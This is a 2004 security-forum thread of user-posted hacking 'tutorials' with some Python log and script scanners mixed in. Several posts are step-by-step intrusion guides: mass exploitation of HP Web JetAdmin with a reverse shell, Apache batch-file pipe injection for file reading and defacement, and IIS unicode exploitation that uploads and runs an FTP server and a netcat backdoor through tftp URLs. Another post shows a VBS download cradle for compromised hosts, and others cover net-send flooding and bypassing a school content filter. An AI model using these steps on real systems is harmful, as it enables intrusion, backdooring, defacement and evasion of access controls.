Government Security
Network Security Resources

security hacking tutorial
67 replies to this topic
#31 seeno



  • Members
  • 2 posts

Posted 29 April 2004 - 02:14 PM

For those who can't use their winmodems (Conexant chipsets).
Did you install a Linux distro and find out you couldn't use your winmodem?
Well, there's a solution for that now: go to Linuxant and download the right package for your kernel/modem (free version), install it and give it a try using kppp. kppp is a GUI version for those who want to connect quickly and/or don't know how to configure pppd. You're limited to 14.4Kbps data with the free version, so I would recommend you buy the full version.

#32 Spawn


    Private First Class

  • Members
  • 31 posts

Posted 02 May 2004 - 07:10 AM

You can download a lot of programming tuts here: Take a look, it's a nice one ;)

#33 JohnAcres


    Private First Class

  • Members
  • 21 posts

Posted 07 May 2004 - 02:14 PM

Alright, I'm gonna do a quick tutorial on how to hack and scan for HP Web JetAdmin, the ways of my knowledge and experience. If anyone has any suggestions feel free to post them, because right now the scanning/checking is fairly crude.

Alright, well I'll start off with the scanning for HP Web JetAdmin. Sfind or scan500, whichever is your favorite scanner of that type; choose a range and scan for port 8000... fairly simple, right... so if you were using sfind you'd do...

sfind -p 8000

Once you have that scan, take scanline or whatever other banner scanner you want to use and banner scan the IPs on port 8000; for scanline it goes like this

sl -bhpt 8000 -f portscan.txt -o bannerscan.txt

Now you have the banner results... you want to find all the banners that have HP Web JetAdmin in them and copy all the IPs to another txt file. Once you have this txt file we can use notepad to (hopefully you didn't scan multiple A class ranges or this trick is kinda hard) turn these IPs into sort of a masshacker/autohacker. Go to Replace, put in the first number set in the range (example: if I scanned to I'd put in 127.) with the period at the end in the Find dialog box... in the Replace box put plus the first number set with the period... so for example (I put 127. in the Find dialog, I put 127. in the Replace With dialog box).

You should now have a file that looks like...

Save and close the file... rename it to a .bat and execute it in the folder with the exploit.

It will go through all the IPs and try to hack them... once it gets to a Windows box that it can hack it will ask you how you want to upload the files, f for ftp or t for tftp... choose your preference; I've always done ftp because I can't host a tftp server. It'll ask you for the username/password for the ftp or tftp server, the IP, the file path, and the file you want uploaded... fill out all these with what you want... for the backdoor on this I HIGHLY recommend using a reverse connect shell because it's not executed right away. Open up your netcat on the port that the victim is gonna connect back to and just wait for a while; there's no set time it'll connect back, so just leave it open for a day or two.

Easy as that... now for the more technical details about the exploit.

The exploit is in perl, so you can download ActivePerl; it's on the bottom of the perl2exe site I think, but it's fairly available. Just use the perl script, which is much more stable and much faster.

Note: I haven't read this over, so sorry for the poor writing that's probably in here... I'll look it over eventually.

#34 Logan



  • Sergeant Major
  • 1,596 posts

Posted 07 May 2004 - 05:09 PM

Even though I'm in the specialist category now, this tut isn't supposed to be too grand... most everyone knows about it... understanding BINARY!

Binary is the lowest level; it is a bunch of switches of ON and OFF, and computers show this with 1 (on) and 0 (off).
Now, for a while I had no clue what they were talking about with the powers of ten crap, so here's a different way to look at it.

Here's a number: 192 (which is an example of one 8-bit section of an IP)
In binary: 11000000
Let's explain this.
1- 0
2- 0
4- 0
8- 0
16- 0
32- 0
64- 1
128- 1
( 128 + 64 = 192 )

OK, so what can you see from that table?
  • In binary, the highest bit is on the left, the lowest on the right.
  • The number's starting number is ONE.
  • The numbers DOUBLE each time they give another digit.
  • No number can be made 2 different ways.
To elaborate on the last thing in the list: imagine the number... 2... OK? (let's not make this more complicated than it is)... well, how would you do two when the only two numbers <= 2 are 1 and 2? You can't use 2 ones, you have to use one two... simple if you think about it.

Binary is a very simple concept once you get to understand it... if you're just starting out learning binary, I hope this helped you.
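As an added example (mine, not Logan's), here is the place-value walk from the table above written out in Python: first for a single octet such as 192, then, going a little beyond the post, for all four octets of a dotted-quad address and for a CIDR prefix length, which is how the same bits end up deciding which hosts share a network. All function and variable names are my own.

```python
# Added example, not from the forum post: the "1- 0, 2- 0 ... 128- 1" table
# from Logan's tutorial as code. Each octet of an IPv4 address is 8 bits;
# the leftmost bit is worth 128 and the rightmost is worth 1.

PLACE_VALUES = [128, 64, 32, 16, 8, 4, 2, 1]  # highest bit on the left


def octet_to_bits(value):
    """Return the 8-character binary string for one octet (0-255).

    Walk the place values from 128 down to 1: if what is left of the value
    is at least the place value, that bit is 1 and we subtract it; else 0.
    """
    if not 0 <= value <= 255:
        raise ValueError("octet out of range: %r" % value)
    bits = []
    remaining = value
    for place in PLACE_VALUES:
        if remaining >= place:
            bits.append("1")
            remaining -= place
        else:
            bits.append("0")
    return "".join(bits)


def bits_to_octet(bits):
    """Inverse of octet_to_bits: add the place values of every '1' bit."""
    if len(bits) != 8 or set(bits) - {"0", "1"}:
        raise ValueError("not an 8-bit string: %r" % bits)
    return sum(place for place, bit in zip(PLACE_VALUES, bits) if bit == "1")


def place_table(value):
    """The post's table for one octet, lowest place first: [(1, 0), ..., (128, 1)]."""
    bits = octet_to_bits(value)
    return [(place, int(bit)) for place, bit in zip(PLACE_VALUES, bits)][::-1]


def ip_to_bits(ip):
    """Dotted quad -> four 8-bit groups, e.g. 192.168.0.1 -> 11000000.10101000.00000000.00000001"""
    octets = ip.split(".")
    if len(octets) != 4:
        raise ValueError("not a dotted quad: %r" % ip)
    return ".".join(octet_to_bits(int(o)) for o in octets)


def bits_to_ip(bits):
    """Four 8-bit groups back to a dotted quad."""
    return ".".join(str(bits_to_octet(group)) for group in bits.split("."))


def network_address(ip, prefix_len):
    """Keep the first prefix_len bits and clear the rest: the CIDR network address.

    This goes beyond the post: it is the reason the bit layout matters for
    firewall rules and subnet masks (192.168.1.77/24 lives in 192.168.1.0).
    """
    if not 0 <= prefix_len <= 32:
        raise ValueError("prefix length must be 0-32")
    flat = ip_to_bits(ip).replace(".", "")
    kept = flat[:prefix_len] + "0" * (32 - prefix_len)
    regrouped = ".".join(kept[i:i + 8] for i in range(0, 32, 8))
    return bits_to_ip(regrouped)


if __name__ == "__main__":
    for place, bit in place_table(192):
        print("%d- %d" % (place, bit))
    print(ip_to_bits("192.168.0.1"))
    print(network_address("192.168.1.77", 24))
```

The "no number can be made two ways" rule from the post is what makes the round trip in `bits_to_octet(octet_to_bits(v))` exact for every value 0-255; if two bit patterns could give the same number, the decoder could not tell them apart.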

#35 Borgon



  • Members
  • 15 posts

Posted 17 May 2004 - 09:04 PM


Can someone include more SQL injection tutorials? I have been doing some research on this topic and all I find are a few papers on exploiting easy login.asp form vulnerabilities, but nothing like a real application blindly, not knowing the database table structures etc.


#36 manu


    Master Sergeant

  • Members
  • 820 posts

Posted 18 May 2004 - 12:08 AM

You can Download a lot of programming tuts here : Take a look, its a nice one

Unfortunately I didn't get any tuts from that PAGE you mentioned. Waste of time.

Manu :huh:

#37 Opal



  • Members
  • 10 posts

Posted 23 May 2004 - 03:26 PM

Vulnerability in Apache for Win32 batch file processing - Remote command

=> Vendor: Apache group

=> Product: Apache web server (Win32) - Running DOS batch files
Tested on:
- Apache 1.3.23
- Apache 2.0.28-BETA (by default includes the /cgi-bin/test-cgi.bat file, which enables this attack)

=> Severity: High, remote command execution and arbitrary file viewing.

=> CVE candidate: CAN-2002-0061
( )

=> Summary: Because of the way the Apache web server handles DOS batch scripts, it is possible to execute remote commands on the web server by using the pipe ('|') character.

The Apache 2.0.x installation is shipped with the default script which can be exploited, but it should be noted that ANY '.bat' or '.cmd' will allow exploitation of this vulnerability.

=> Description: When a request for a DOS batch file (.bat or .cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) which will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe ('|') with commands appended to it as parameters to the CGI script, and the interpreter will execute them.

1. This vulnerability has been exploited on:
- Apache 1.3.23
- Apache 2.0.28-BETA (by default includes the /cgi-bin/test-cgi.bat file, which enables this attack)

When a request for a DOS batch file (.bat or .cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('|') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute

2. Find a webserver running Apache 1.3.23 (Win) or Apache 2.0.28-BETA (Win).

(a) To view the httpd.conf file residing in the /conf directory of the Apache installation, you must copy it into the virtual web root.

To do this, write in your browser:;httpd.conf

(b) To view the contents of the C:\ drive, create in /htdocs a file containing the directory listing of the drive.

To do this, write in your browser:\dir.txt

(c) To make your deface you will use the echo command.

To do this, write in your browser:;echo Defaced bY YOU+>>+..\htdocs\index.html

This will append the string "Defaced bY YOU" to the index.html file residing in the virtual web root directory.

That's how this vulnerability can be exploited...

#38 ShouiZen



  • Members
  • 201 posts

Posted 25 May 2004 - 07:51 AM

Yes, it's good software, the autotof_dameware_3.72_3.73.
Yeah man, it's a good job :D :lol: :)

#39 Opal



  • Members
  • 10 posts

Posted 01 June 2004 - 01:23 AM

The How-To Hack IIS Servers For Pubstros
Tutorial about hacking using IIS exploits
This one goes for the people that ask for a tut to start hacking.
If you wanna know more, research yourself.

Pub Hacking Tutorial

The How-To Hack IIS Servers For Pubstros
March 20, 2002


############ For Educational Use Only ############


Getting started is simple... let me warn you that what you're doing is illegal and dangerous. Now then,
this tutorial tells you how to hack IIS servers and make them a pub... and how to rehack someone
else's pub hahahahaha!

Now then, the tools and knowledge you will need are as follows

Tools Required:

1. Serv-U FTP Server 4.0 works just fine, but version 3.0 doesn't require an additional dll file
2. TFTPSuitePro2000 (h**p://
3. Your brain, with knowledge of the IIS Unicode exploit or MSDAC exploit
4. Internet Explorer
5. Other things to try

OK, let me start by saying this is for "Education Purposes" only and I take no responsibility for what you do

The Setup

Step 1: Install Serv-U AND download the already preconfigured ServUDaemon from me (recommended, as I will be explaining from this)

The reason why I told you to download both is because the Serv-U version 4 that you download has an admin program, so you can
make your own ini file after you understand everything I have in mine.

Step 2: Install TFTPSuite (during installation pick SERVER)

TFTPSuitePro setup: open TFTPSuitePro; when it asks you to register hit Register, then Cancel. You should have something that looks
like this. Hit System->Setup; for Inbound Path File, hit Browse and pick the C:\FTP dir we made, and do the same for
Outbound, then hit OK. Now then, when it's time to upload files the TFTP SERVER MUST BE RUNNING

Step 3: Unzip the Zip/Rar, where you will find some goodies to help you scan for IIS servers and find one to hack

Here you will find tons of little programs that will assist you in hacking your server.


Step 5: Start Making the Pub

OK, I'm assuming you have a host that you can maybe get away with uploading files to... and I say this because some networks
are behind firewalls that don't allow TFTP to connect to an outside host and establish a connection. Thus even though
you can use the unicode exploit on it to view all the files, it still doesn't mean you can upload files to it...
Plus some host administrators make it so that you can't write to the HD... GOOD LUCK THERE

Starting The HACK


The right side: you should be at a directory listing in Internet Explorer. The dir should look like this:

h**p:// ir+c:\ <----- This line will vary

Directory of c:\

07/17/02 12:17a 1,000,000 ---=1Mb=---
05/03/02 08:57a 0 AUTOEXEC.BAT
05/03/02 08:54a 0 AUTOEXEC.CAM
06/01/01 09:09a 0 CONFIG.SYS
12/26/01 12:46p <DIR> Desktop
06/01/01 02:20p <DIR> I386
07/08/02 02:52p <DIR> intepub
06/01/01 02:49p <DIR> NIC
12/23/01 08:32p <DIR> NIMDA TO
12/23/01 08:32p <DIR> Nimda Tool
07/17/02 05:56p 65,634,304 pagefile.sys
01/04/02 04:31p <DIR> Program Files
07/17/02 12:14a <DIR> TEMP
06/05/01 05:01p <DIR> temptape
06/01/01 04:53p <DIR> Video
12/23/01 09:53p <DIR> Windows Update Setup Files
07/17/02 05:50p <DIR> WINNT
19 File 72,687,972 bytes
480,750,592 bytes free

OK, you get the idea of what your browser looks like because you're experienced, but you are clueless about this pub crap.
Now then, you will need to start and run the TFTP SERVER, making sure you aren't running any firewall, because it will block
your request. Now we will need to send the files through the TFTP Server to the host. And to do this you do something like

h**p:// :\winnt\system32\tftp.exe+"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\Serv UDaemon.exe

Now then, you aren't limited to just 1 dir to install this server to... I like to hide mine in c:\winnt\system but some people use c:\intepub\scripts

h**p:// :\winnt\system32\tftp.exe+"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\Serv UDaemon.exe

So then you would copy the above line into Internet Explorer and hit Enter. Look at your TFTPSuitePro window
and you should see it's uploading a file. NOTE: SOMETIMES you get an error msg; just refresh the page or... copy into another window and try again.
Remember, sometimes you get this msg because the host can't connect properly to you...

Repeat for the following files:

SFIND.exe -------> used to scan for more servers
KILL.EXE -------> used to kill a task; very handy
TLIST.EXE -------> used to list all running processes (Task List)
ncx99.exe -------> used as a backdoor remote trojan that runs on port 99
iis-scanner.EXE -------> great for scanning servers
servudaemon.ini -------> needed for Serv-U


h**p:// -i+%20**.***.**.**+GET+ServUDaemon.ini+c:\winnt\system\ServUDaemon.ini

h**p:// -i+%20**.***.**.**+GET+ServUDaemon.exe+c:\winnt\system\ServUDaemon.exe

h**p:// -i+%20**.***.**.**+GET+ServUDaemon.ini+c:\inetpub\scripts\ServUDaemon.ini
h**p:// -i+%20**.***.**.**+GET+ServUDaemon.ini+c:\inetpub\scripts\ServUDaemon.exe

h**p:// -i+%20**.***.**.**+GET+TzoLibr.dll+c:\winnt\system\TzoLibr.dll

h**p:// -i+%20**.***.**.**+GET+ncx99.exe+c:\winnt\system\ncx99.exe

h**p:// -i+%20**.***.**.**+GET+bnc.cfg+c:\winnt\system\tlist.exe


h**p:// c:\winnt\system\ncx99.exe

h**p:// +c:\winnt\system\ncx99.exe

h**p://\nc x99.exe%20/h

After the file has been executed the FTP should be up!

Test it with the server IP/port/L/P you set up back in the Serv-U FTP settings.

If it works you now have complete control over the system!

Now then, here is where Serv-U 4.0 comes in: you may now use the admin program that comes with it so that you can

set up your server the way you want. You have admin rights.

Other shit: how to use 'Kill' and 'Tlist' and 'ncx99.exe'

Tlist = lists all running programs on the remote machine
Kill = kills the ones you specify
ncx99.exe = DOS-like trojan

How to use ncx99

C:\>telnet host 99

Then once you connect to your server you will see a DOS-like environment, so find where you uploaded tlist.exe and execute it

c:\> cd winnt
c:\winnt> cd system

Tlist is good when you have ncx99.exe installed, so it's easier to just call it up

-2 Idle.exe
4 System.exe
840 smss.exe
948 csrss.exe
972 winlogon.exe NetDDE Agent
1016 services.exe
1028 lsass.exe
1216 svchost.exe
1364 svchost.exe
1500 svchost.exe
1636 svchost.exe
1820 spoolsv.exe
1952 CTSVCCDA.exe
1988 mdm.exe
2024 DUC20.exe Duc20
408 MsPMSPSv.exe
3024 svchost.exe
360 explorer.exe Program Manager
3496 ctfmon.exe CiceroUIWndFrame
3068 WinCinemaMgr.exe InterVideo WinCinema Manager
1124 evntsvc.exe Notification Wnd for RNAdmin
1568 msmsgs.exe DDE Server Window
2664 iis-scanner.exe Notification Window
2172 r_server.exe
3712 daemon.exe
2800 cmd.exe Command Prompt
3880 TLIST.exe
-2 _Total.exe

Now then, to kill it there are two ways. I will show you the first, from within ncx99.exe, because it's best.

Just look at the tlist.exe list and find the system process you want to kill.

Now, from the same dir that you installed kill, run kill and

for me it would be


Now then, let's say I wanted to close explorer.exe. I look at the tlist and see '360 explorer.exe Program Manager'.

360 is the process id that you will use to close down explorer.exe, so you call it like this

c:\>winnt\system\kill.exe 360

Do another tlist.exe and you will no longer see explorer.exe there.

The other way to do this is to use the URL

h**p:// +c:\winnt\system\kill.exe?number

where number is again from the tlist.exe

So to kill explorer.exe we do something like this

h**p:// +c:\winnt\system\kill.exe?360

and it should say killed.
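Both the Apache batch-file advisory in post #37 and the IIS unicode/tftp.exe walkthrough above leave the same kind of trace in web server logs: a request whose path or query asks the server to run cmd.exe, tftp.exe or a batch file with attacker-supplied arguments. What follows is an added example, not part of either post, of how an administrator can sweep access logs for those traces. The log lines are constructed samples in Apache common log format and IIS W3C extended format; the rule names and functions are my own. The `%c0%af` style markers are the overlong-UTF-8 directory traversal encodings that the IIS unicode exploit relies on, and `&` is checked alongside `|` because cmd.exe treats both as command separators.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (not real logs), Apache common log format.
APACHE_LOG = """\
10.0.0.5 - - [23/May/2004:15:26:01 +0000] "GET /cgi-bin/test-cgi.bat?%7Cdir HTTP/1.0" 200 512
10.0.0.7 - - [23/May/2004:15:27:10 +0000] "GET /index.html HTTP/1.1" 200 1043
10.0.0.5 - - [23/May/2004:15:28:44 +0000] "GET /cgi-bin/test-cgi.bat?foo+|+type+..\\conf\\httpd.conf HTTP/1.0" 200 2210
"""

# Constructed sample lines, IIS W3C extended format; column order comes from the #Fields: header.
IIS_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-06-01 01:23:45 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2004-06-01 01:24:02 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp.exe+-i+10.0.0.9+get+ServUDaemon.exe 502
2004-06-01 01:25:30 10.0.0.11 GET /default.htm - 200
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

TRAVERSAL_MARKERS = ("%c0%af", "%c1%9c", "%255c", "%252f")  # overlong UTF-8 / double-encoded slashes
SHELL_METACHARS = ("|", "&")   # cmd.exe command separators; the advisory's attack uses '|'
LOLBINS = ("cmd.exe", "tftp.exe")


def parse_lines(log_text):
    """Yield (lineno, client_ip, raw_stem, raw_query) for Apache CLF or IIS W3C lines."""
    fields = None
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # remember the W3C column layout
            continue
        if line.startswith("#"):
            continue                           # other W3C directives
        m = CLF_RE.match(line)
        if m:
            stem, _, query = m.group("target").partition("?")
            yield lineno, m.group("ip"), stem, query
            continue
        if fields:
            cols = line.split()
            if len(cols) == len(fields):
                row = dict(zip(fields, cols))
                query = row.get("cs-uri-query", "-")
                yield lineno, row["c-ip"], row["cs-uri-stem"], "" if query == "-" else query


def classify(raw_stem, raw_query):
    """Return the names of the rules a request trips (empty list = nothing suspicious)."""
    hits = []
    stem = unquote_plus(raw_stem)
    query = unquote_plus(raw_query)
    # CAN-2002-0061 pattern: a .bat/.cmd CGI given a shell separator in its arguments.
    if stem.lower().endswith((".bat", ".cmd")) and any(c in query for c in SHELL_METACHARS):
        hits.append("batch-cgi-pipe-injection")
    # Checked on the raw stem: the point of the encoding is to survive decoding.
    if any(mark in raw_stem.lower() for mark in TRAVERSAL_MARKERS):
        hits.append("iis-encoded-traversal")
    if any(binary in (stem + " " + query).lower() for binary in LOLBINS):
        hits.append("web-request-spawns-cmd-or-tftp")
    return hits


def scan(log_text):
    """Run every rule over a log and return one alert dict per suspicious request."""
    alerts = []
    for lineno, ip, stem, query in parse_lines(log_text):
        hits = classify(stem, query)
        if hits:
            alerts.append({"line": lineno, "client": ip, "stem": stem, "rules": hits})
    return alerts


def clients_by_alert_count(alerts):
    """Rank source addresses by how many suspicious requests they sent."""
    counts = {}
    for alert in alerts:
        counts[alert["client"]] = counts.get(alert["client"], 0) + 1
    return sorted(counts.items(), key=lambda kv: -kv[1])


if __name__ == "__main__":
    for alert in scan(APACHE_LOG) + scan(IIS_LOG):
        print(alert)
    print(clients_by_alert_count(scan(APACHE_LOG) + scan(IIS_LOG)))
```

A hit on `batch-cgi-pipe-injection` against a Win32 Apache means the condition the advisory describes is reachable; since the advisory notes that any .bat or .cmd CGI is exploitable, removing or disabling all of them closes it. Hits on the two IIS rules, especially with a 200 status, are the moment to look in the web root and c:\winnt\system for files a TFTP GET may have dropped.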

#40 KuerbY


    Staff Sergeant

  • Members
  • 254 posts

Posted 01 June 2004 - 07:07 AM

FXP crap, I hate it :(
Anyway, I think everybody in here knows about IIS hacking...

#41 Apok^


    Private First Class

  • Members
  • 27 posts

Posted 02 June 2004 - 05:58 AM

K, it has been a while, but I can remember this.

Some fun stuff to do in a lab:

shutdown -s -m \\[computer] (shuts down computer)

shutdown -a -m \\[computer] (aborts shutdown)

Open a .txt file

Type in this EXACTLY:
net send [username....blabla, type net send /? for more] "message"
goto a

Rename the file to a .bat instead of .txt
It will net send them to death :D

#42 globey



  • Members
  • 189 posts

Posted 08 June 2004 - 02:06 PM

by diablohorn

*Tutorial on getting the stuff on a stro when the machine has got no TFTP or FTP.*
*Tutorial written by: DiabloHorn *
*Comment: This is intended mostly for rehacking, sometimes for hacking new ones *
*Creditz: Kimatrix, *
*COMMENT: This is mostly intended to only download wget.exe with it; don't try to *
*download big things like serv-u *


0) Opening Words
1) The Netcat Way
2) .vbs script
3) Greetz

* 0) Opening Words *
Hmm, what shall I say this time?
Oh yeah, I'm trying to improve my English; hope you will read tuts of mine with perfect English on it,
pretty impossible but I'll try.
Well, about the tutorial you are about to read: this tutorial is meant for when you are on a machine,
you've got a shell, but when typing the command tftp or ftp to get the files on it, it returns:

"ftp" Command not recognized or some similar error.

If that error sounds familiar then this tutorial might be for you.
I say might because if telnet is also deactivated then, well, too bad.
Hope you are all still awake, so read on and get started.

* 1) The Netcat Way *

1) Purpose
2) Tools Needed
3) HowTo

1) Purpose

Using 2 netcats to retrieve a file

2) Tools Needed

- a shell
- 2 netcats
- file to transfer

3) HowTo

Fire up netcat on your machine like this:

nc.exe -l -p 4455 -u -vvv < file.exe

When done, fire up netcat on the hacked machine like this:

nc.exe -u host port > outputfile.exe

When this is done there will be a connection, but nothing will be sent until you send a character from your
own machine to the hacked one, so just type something; "a" would be enough, and hit enter.
Now the stupid part with this: you have no idea how long it will take, so I suggest you DON'T
transfer serv-u with this, but rather a thing like wget.exe, and then just download the stuff from the web.
This is tested locally and remotely with normal access to the shell, so just tweak it until it works for you.

* 2) .vbs script *

1) Purpose
2) Tools Needed
3) HowTo

1) Purpose

This is meant to make a .vbs executable script that downloads a file from the web,
similar to wget but it doesn't need to be uploaded; it also works when the tftp and ftp and net commands
are disabled.

2) Tools Needed

- a shell
- a commandline editor
- if no commandline editor is available, the "echo" command

3) HowTo

First of all make sure any anti-virus is disabled, because a .vbs file sometimes gets caught
by antivirus programs.

First I'll discuss the commandline editor option,
then I'll discuss the echo option.

########Commandline editor option####################

First of all go to the directory you want the file to be downloaded to, for example:

cd c:\Recycler

When done, do this:

copy con get.vbs

When this is done you can immediately start typing text, so let's type the following things

Dim DataBin
Dim HTTPGET
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")
HTTPGET.Open "GET", "", False
HTTPGET.Send                      ' sends the request; without this ResponseBody stays empty
DataBin = HTTPGET.ResponseBody
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim SendBinary
Set SendBinary = CreateObject("ADODB.Stream")
SendBinary.Type = adTypeBinary
SendBinary.Open
SendBinary.Write DataBin
SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite

Things you MUST change in the above code:

HTTPGET.Open "GET", "", False
Change that to the place where your OWN .exe file is located.
SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite
Change that to the name of the .exe file you want to have and its location.

When done typing the above, just save the file by pressing CTRL+Z. When the file is saved,
just execute it like a normal .exe and wait till the file is downloaded.

########ECHO option####################

echo Dim DataBin >c:\recycler\get.vbs
echo Dim HTTPGET >>c:\recycler\get.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\recycler\get.vbs
echo HTTPGET.Open "GET", "", False >>c:\recycler\get.vbs
echo HTTPGET.Send >>c:\recycler\get.vbs
echo DataBin = HTTPGET.ResponseBody >>c:\recycler\get.vbs
echo Const adTypeBinary=1 >>c:\recycler\get.vbs
echo Const adSaveCreateOverWrite=2 >>c:\recycler\get.vbs
echo Dim SendBinary >>c:\recycler\get.vbs
echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\recycler\get.vbs
echo SendBinary.Type = adTypeBinary >>c:\recycler\get.vbs
echo SendBinary.Open >>c:\recycler\get.vbs
echo SendBinary.Write DataBin >>c:\recycler\get.vbs
echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite >>c:\recycler\get.vbs

Things you MUST change in the above code:

HTTPGET.Open "GET", "", False
Change that to the place where your OWN .exe file is located.
SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite
Change that to the name of the .exe file you want to have and its location.

When done, just execute it like a normal .exe and wait till the file is downloaded.

* 3) Greetz *

To the wonderful world of the internet, and Kimatrix for helping me on testing the netcat things.

Hack it all, just don't break it all.

Also want to say thx to all the peeps on NFE who gave me a nice place to learn new things in a quick way
and help other peeps out with my knowledge.
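Added example (mine, not DiabloHorn's): the two ways the post builds get.vbs, typed with copy con or assembled with echo, both leave the same tokens on disk: Microsoft.XMLHTTP, ResponseBody, ADODB.Stream and SaveToFile. A host-side sweep that looks for that combination flags both forms, including the batch file that writes the script, without needing an antivirus signature for one particular file. The sample scripts below are constructed; the indicator names and functions are my own.

```python
import os
import re

# Constructed samples (not files from the post): the cradle as a .vbs, the
# batch file that assembles it with echo, and a benign script for contrast.
SAMPLE_VBS = '''Dim DataBin
Dim HTTPGET
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")
HTTPGET.Open "GET", "http://example.invalid/file.exe", False
HTTPGET.Send
DataBin = HTTPGET.ResponseBody
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim SendBinary
Set SendBinary = CreateObject("ADODB.Stream")
SendBinary.Type = adTypeBinary
SendBinary.Open
SendBinary.Write DataBin
SendBinary.SaveToFile "c:\\file.exe", adSaveCreateOverWrite
'''

SAMPLE_ECHO_BAT = r'''echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\recycler\get.vbs
echo DataBin = HTTPGET.ResponseBody >>c:\recycler\get.vbs
echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\recycler\get.vbs
echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite >>c:\recycler\get.vbs
'''

BENIGN_VBS = '''Set WshShell = CreateObject("WScript.Shell")
WshShell.Popup "Backup finished", 5, "Nightly job"
'''

# Indicators of the XMLHTTP + ADODB.Stream download cradle. VBScript is
# case-insensitive, so every pattern is matched with re.I.
INDICATORS = {
    "xmlhttp_object": re.compile(r'CreateObject\(\s*"(Microsoft|MSXML2)\.(Server)?XMLHTTP[^"]*"\s*\)', re.I),
    "http_get": re.compile(r'\.Open\s+"GET"', re.I),
    "response_body": re.compile(r'\.ResponseBody\b', re.I),
    "adodb_stream": re.compile(r'CreateObject\(\s*"ADODB\.Stream"\s*\)', re.I),
    "save_to_file": re.compile(r'\.SaveToFile\s+"?([^",\r\n]+)', re.I),
}
# All four together mean "fetch bytes over HTTP and write them to disk".
CRADLE_SET = {"xmlhttp_object", "response_body", "adodb_stream", "save_to_file"}


def find_indicators(text):
    """Names of every indicator present in the text."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def dropped_paths(text):
    """Paths passed to SaveToFile, i.e. where the downloaded payload would land."""
    return [m.group(1).strip() for m in INDICATORS["save_to_file"].finditer(text)]


def is_download_cradle(text):
    """True when the full fetch-and-write combination is present."""
    return CRADLE_SET <= find_indicators(text)


def scan_tree(root, exts=(".vbs", ".vbe", ".wsf", ".bat", ".cmd")):
    """Walk a directory and report files containing the cradle.

    Batch files are included because the echo variant builds the script from one.
    """
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            if is_download_cradle(text):
                findings.append({"file": path, "drops": dropped_paths(text)})
    return findings


if __name__ == "__main__":
    for label, sample in (("vbs", SAMPLE_VBS), ("echo bat", SAMPLE_ECHO_BAT), ("benign", BENIGN_VBS)):
        print(label, is_download_cradle(sample), sorted(find_indicators(sample)), dropped_paths(sample))
```

Requiring all four indicators rather than any one keeps ordinary admin scripts (which often use ADODB.Stream or XMLHTTP alone) out of the results; the paths returned by `dropped_paths` are where to look next on a host where a hit turns up.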

#43 wambari



  • Members
  • 7 posts

Posted 30 June 2004 - 03:28 AM

Bypass school web content filter:

Most of these run on the school proxy server. Here's how to bypass it; result: unlimited and unrestricted internet access, multimedia downloads, .exe's etc.

- Collect the external IP address of the school's DNS server (nothing a little social engineering can't solve).
- Get the internal IP address of the school proxy server (you can get this from the internet connection settings of your browser under proxy servers).

- Get admin privileges on the client (need this to change IP settings on the machine).

- Edit the TCP/IP connection gateway of your LAN by getting into the advanced option and adding a default gateway; set this to the IP address of the proxy server obtained in step 1 above.

- Under TCP/IP Properties again, set the Preferred DNS server to the external DNS IP obtained in Step 1.

- Remove the proxy settings on the browser by selecting the 'directly connected to internet' option.

- Fire up the browser and surf!



#44 IcedOut3E



  • Members
  • 154 posts

Posted 03 September 2004 - 08:03 PM

Maybe just a quick addition to the bypassing school filter.

Depending on how good the school's proxy is, you can usually just use a free proxy-based anonymous browsing site for any websites that block you out.

I know I did it when I was in school.

My school used the "Bess" proxy server.

#45 Vort3x



  • Members
  • 161 posts

Posted 04 September 2004 - 12:44 PM

This topic serves as a reference to Web multimedia programs.

  • Emoticon Websites
  • Adobe Photoshop 6+ Tutorials (6, 7)
  • Macromedia Fireworks MX Tutorials
  • Macromedia Flash 5+ Tutorials (5, MX, MX 2K4)
